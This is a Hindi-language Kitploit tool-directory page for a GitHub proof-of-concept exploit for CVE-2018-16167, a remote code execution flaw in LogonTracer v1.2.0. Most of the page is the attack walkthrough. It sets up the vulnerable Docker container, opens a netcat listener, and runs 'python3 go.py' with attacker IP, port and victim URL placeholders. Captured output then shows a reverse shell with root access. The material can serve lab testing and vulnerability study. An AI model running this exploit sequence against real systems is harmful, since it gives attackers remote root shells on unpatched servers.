Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2018-16167 — LogonTracer v1.2.0 रिमोट कोड निष्पादन भेद्यता के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, Python और netcat के माध्यम से रिवर्स शेल प्रदान करता है। | Kitploit
उपकरण/GitHubGitHub/dnr6419/cve-2018-16167
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूल
GitHubdnr6419/cve-2018-16167

CVE-2018-16167

LogonTracer v1.2.0 रिमोट कोड निष्पादन भेद्यता के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, Python और netcat के माध्यम से रिवर्स शेल प्रदान करता है।

रिपॉजिटरी देखें
5 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

स्थापना और निष्पादन का क्रम

0. LogonTracer स्थापित करें

जिस संस्करण में कमज़ोरी पाई गई थी, उस 1.2. 0 संस्करण के logontracer को dockerhub से डाउनलोड करें।

root@kitploit:~
 $docker pull jpcertcc/docker-logontracer:v1.2.0 

1. LogonTracer चलाएँ

निम्नलिखित कमांड से कंटेनर को चालू करें।

root@kitploit:~
 $docker run \
   --detach \
   --publish=7474:7474 --publish=7687:7687 --publish=8080:8080 \
   -e LTHOSTNAME=[IP_ADDR] \
   jpcertcc/docker-logontracer:v1.2.0

2. शेल प्राप्त करने के लिए होस्ट पर nc

जिस होस्ट से शेल प्राप्त करना है, उस होस्ट के एक विशिष्ट पोर्ट को nc का उपयोग करके खोलें।

root@kitploit:~
 
PS C:\Users\0ppr2s\Desktop\main\nc> .\nc64.exe -lvp {attacker_port}
listening on [any] 8888 ...

3. आक्रमण कोड चलाएँ

आक्रमण कोड चलाएँ।

root@kitploit:~
 
dnr6419@DESKTOP-4CJA7LD ~/docker/logon
☺  python3 go.py {attacker_ip} {attacker_port} http://{victime_ip}:8080

निष्पादन परिणाम

जैसा कि नीचे चित्र में दिखाया गया है, आक्रमण कोड सफलतापूर्वक चलता है और आप रिमोट शेल प्राप्त कर सकते हैं।

root@kitploit:~
PS C:\Users\0ppr2s\Desktop\main\nc> .\nc64.exe -lvp 8888
listening on [any] 8888 ...
192.168.56.103: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [192.168.56.1] from (UNKNOWN) [192.168.56.103] 41858: NO_DATA
/usr/local/src/LogonTracer # ^[[16;30Rid
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
/usr/local/src/LogonTracer # ^[[20;30R

image

टूल डाउनलोड करें